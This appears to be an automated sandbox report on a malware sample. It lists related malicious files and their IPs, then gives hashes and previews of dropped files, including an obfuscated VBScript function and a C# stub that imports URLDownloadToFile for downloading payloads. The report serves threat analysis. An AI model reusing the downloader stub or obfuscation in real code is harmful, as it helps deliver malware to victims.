                                                                                          INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 142.215.209.78
                                                                                          Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                          • 142.215.209.78
                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 142.215.209.78
                                                                                          SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                          • 142.215.209.78
                                                                                          seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                          • 142.215.209.78
                                                                                          transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 142.215.209.78
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          HUMBER-COLLEGECAPurchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 142.215.209.78
                                                                                          Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 142.215.209.78
                                                                                          SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                          • 142.215.209.78
                                                                                          Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                          • 142.215.209.78
                                                                                          INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 142.215.209.78
                                                                                          Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                          • 142.215.209.78
                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 142.215.209.78
                                                                                          SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                          • 142.215.209.78
                                                                                          seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                          • 142.215.209.78
                                                                                          transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 142.215.209.78
                                                                                          AS-COLOCROSSINGUSSignert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 107.173.4.61
                                                                                          New order.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.220.29
                                                                                          Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 192.3.243.136
                                                                                          Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 192.3.243.136
                                                                                          Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 107.173.4.61
                                                                                          New order.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.220.29
                                                                                          Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 107.173.4.61
                                                                                          New order.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.220.29
                                                                                          purchase order (2).xlsGet hashmaliciousUnknownBrowse
                                                                                          • 198.46.178.167
                                                                                          purchase order (2).xlsGet hashmaliciousUnknownBrowse
                                                                                          • 198.46.178.167
                                                                                          NET1-ASBGPurchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 94.156.177.95
                                                                                          Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 94.156.177.95
                                                                                          Scan docs.exeGet hashmaliciousLokibotBrowse
                                                                                          • 94.156.177.95
                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          • 94.156.177.95
                                                                                          FDA50N50 ONESMI _10000.exeGet hashmaliciousLokibotBrowse
                                                                                          • 94.156.177.220
                                                                                          sh.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                          • 93.123.85.201
                                                                                          ntpd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                          • 93.123.85.201
                                                                                          ftp.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                          • 93.123.85.201
                                                                                          na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                          • 93.123.85.201
                                                                                          sshd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                          • 93.123.85.201
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0eQUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • 142.215.209.78
                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • 142.215.209.78
                                                                                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 142.215.209.78
                                                                                          http://portableapps.comGet hashmaliciousUnknownBrowse
                                                                                          • 142.215.209.78
                                                                                          Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 142.215.209.78
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                          • 142.215.209.78
                                                                                          QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 142.215.209.78
                                                                                          grd.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                          • 142.215.209.78
                                                                                          SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                          • 142.215.209.78
                                                                                          Email_sending_restriction_[sebastien.morel!](#HOHSM).htmlGet hashmaliciousUnknownBrowse
                                                                                          • 142.215.209.78
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Users\user\AppData\Roaming\188E93\31437F.exeinvoice727282_PDF..exeGet hashmaliciousAgentTeslaBrowse
                                                                                            #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                              6038732).vbsGet hashmaliciousLokibotBrowse
                                                                                                cirby0J3LP.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWorm, zgRATBrowse
                                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                    SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                      3vj5tYFb6a.exeGet hashmaliciousSnake Keylogger, zgRATBrowse
                                                                                                        50000PCSPIC12F1501-ESN.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exeGet hashmaliciousXWormBrowse
                                                                                                            Jdxvyx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):143380
                                                                                                              Entropy (8bit):3.6712104367027116
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:WKjHhIZg8X9/CZUN6RRj09RrXaTGZ8tE6cORoG73St8gt5peRyMyr0+EnGGwm:fN8X9/CGIRR2Ro
                                                                                                              MD5:7450B95AC8FA59E12E46A4C2A6CF36ED
                                                                                                              SHA1:F1E5EC3ACDD59283CCAF7611F572CCBBD4009B63
                                                                                                              SHA-256:12A0A30BF86B8A8EB35E4309A523FAF7673C467DC623F3CFB09FCD45FC4FC139
                                                                                                              SHA-512:951B71EDDD8C390E9BB37585F8865E7E7343A967A62321EDD74B06D9474DF3F0C8C5440A91E96D672D5369B181828C655F28D233F5E3A5FB6945C48EF808B754
                                                                                                              Malicious:false
                                                                                                              Preview:..........F.u.n.c.t.i.o.n. .s.o.n.a.n.t.e.(.B.y.V.a.l. .p.i.o.c.a.m.e.c.r.a.n.s.,. .B.y.V.a.l. .x.a.n.t.e.l.o.m.a.,. .B.y.V.a.l. .r.e.c.a.t.a.d.a.m.e.n.t.e.)..... . . . .D.i.m. .p.i.r.o.s.e..... . . . .p.i.r.o.s.e. .=. .I.n.S.t.r.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .x.a.n.t.e.l.o.m.a.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .p.i.r.o.s.e. .>. .0..... . . . . . . . .p.i.o.c.a.m.e.c.r.a.n.s. .=. .L.e.f.t.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .p.i.r.o.s.e. .-. .1.). .&. .r.e.c.a.t.a.d.a.m.e.n.t.e. .&. .M.i.d.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .p.i.r.o.s.e. .+. .L.e.n.(.x.a.n.t.e.l.o.m.a.).)..... . . . . . . . .p.i.r.o.s.e. .=. .I.n.S.t.r.(.p.i.r.o.s.e. .+. .L.e.n.(.r.e.c.a.t.a.d.a.m.e.n.t.e.).,. .p.i.o.c.a.m.e.c.r.a.n.s.,. .x.a.n.t.e.l.o.m.a.)..... . . . .L.o.o.p..... . . . ..... . . . .s.o.n.a.n.t.e. .=. .p.i.o.c.a.m.e.c.r.a.n.s.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . .
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5829
                                                                                                              Entropy (8bit):4.901113710259376
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                              MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                              SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                              SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                              SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                              Malicious:false
                                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                              Malicious:false
                                                                                                              Preview:@...e...........................................................
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Nov 15 18:26:30 2024, 1st section name ".debug$S"
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1328
                                                                                                              Entropy (8bit):3.970755525291528
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:HGe9EuZf8MSuXDfHswKEbsmfII+ycuZhNkPakSFoPNnqSqd:DB8uzTKPmg1ulkPa3FQqSK
                                                                                                              MD5:44E96A7449299846E8E847696C9D1AF6
                                                                                                              SHA1:B8C763C8EEFDFB4C06FAE8FD463FA3284E45EB28
                                                                                                              SHA-256:6ABA106CF10AA54500DA20E9E7E4085C6FB9658B0A0B0B27157C4CB0DED1AE65
                                                                                                              SHA-512:1C32C1418B2608E087286EC57F253C8CE2D6FEF853AB191E334E03FE4E55E1C22E44234EB5AA9211B8479EE840E624ABA5DE3979A16D71A861C910C42412BE8E
                                                                                                              Malicious:false
                                                                                                              Preview:L...V.7g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP.............................`.R..........4.......C:\Users\user\AppData\Local\Temp\RESF0FC.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.n.f.t.n.g.t.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                              File Type:MSVC .res
                                                                                                              Category:dropped
                                                                                                              Size (bytes):652
                                                                                                              Entropy (8bit):3.0754869325454095
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryOPak7YnqqFoPN5Dlq5J:+RI+ycuZhNkPakSFoPNnqX
                                                                                                              MD5:DDFA058AF8A4168312F61FF8BB60E052
                                                                                                              SHA1:731AA83C6BF1F8975E8E0730684E7C42153512D7
                                                                                                              SHA-256:4D4531C5526B0DE6019BCD6FCFA8E70A8911485271A08F0E3DB38BE2490EF547
                                                                                                              SHA-512:5B972441364F05D75C7A381086D3DE31EC48354662E9E0E62713EB6106091563E25D38A5455F3B9AAB27DBBCF62BEDF84F2936FBB2A14FC962A6BA1B4B8ED83E
                                                                                                              Malicious:false
                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.n.f.t.n.g.t.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.n.f.t.n.g.t.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):484
                                                                                                              Entropy (8bit):3.851396934991774
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:V/DsYLDS81zuFlsUWmMgQXReKJ8SRHy4HUdKWQmCYKLmuD/hINQjy:V/DTLDfuDWLXfHmKW3KLZDSN6y
                                                                                                              MD5:8FC8053789EDE73B926DA0B3D6B6AB73
                                                                                                              SHA1:FEB5351771DC5474C1E18579123E3A5320B12120
                                                                                                              SHA-256:DA39F89715A7D00579CDDD1C02AB586ED7B0C24618CB54555CD37A50D92DC9AB
                                                                                                              SHA-512:271CE0712B57E18229515700CC941D34534CE5B0F6209C086B3F71E93A32AE70882C537AC416B96D08B8C4CC25064C6870336A30B3512C1A932A4445B2468644
                                                                                                              Malicious:false
                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace PBosISR.{. public class OrcYDvQ. {. [DllImport("URLMON.DLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZTkZnLZTgTB,string Fk,string lDC,uint HapOYvihc,IntPtr NjRcdCjW);.. }..}.
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):369
                                                                                                              Entropy (8bit):5.185386335202168
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f1nt0zxs7+AEszIwkn23f1n/H:p37Lvkmb6KRfP0WZEif5
                                                                                                              MD5:1A44C15D7A0F45649B283A9C5325F968
                                                                                                              SHA1:D81E485B350EAC6E935BAF2E85C83BB5932C86AF
                                                                                                              SHA-256:399714DB4D3A0C2E01E3CC8C7196E3A35C7A7223555696E3CF79176240C7E50F
                                                                                                              SHA-512:CF1EF24A8AA5018C46A2D5FBDD8586071582BAE4AD6D2C63A0964E07977E4C20ED9F3AED21C0E1D1E8CE2B421CD25B3B8B1143A3D5904414C641FAC914015EF3
                                                                                                              Malicious:true
                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.0.cs"
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3072
                                                                                                              Entropy (8bit):2.838923966250377
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:etGSwPBG5eAdF8mUBkN1qhNS2+9tkZfXAQBCMEWI+ycuZhNkPakSFoPNnq:6PsAdemR6S2/JXAZMn1ulkPa3FQq
                                                                                                              MD5:58FE5DFE02F8E1CF1CE5090131318085
                                                                                                              SHA1:3480534E9DA32C624E3606B5B1C07CB16FE39E6D
                                                                                                              SHA-256:DED4CCE19C8EBAD42F5B4FAA50914D5E75F54BDE76D0605423DF71B0785EA3D8
                                                                                                              SHA-512:CF65DFDF39885A0D4D9493C47D59E8E87A9D753990F8B14EA027420A11EF8C4F68298578DC252F685CDE4D170F902E9D23D7E3E3F2AFC48E9FAB39F3CB0A6984
                                                                                                              Malicious:false
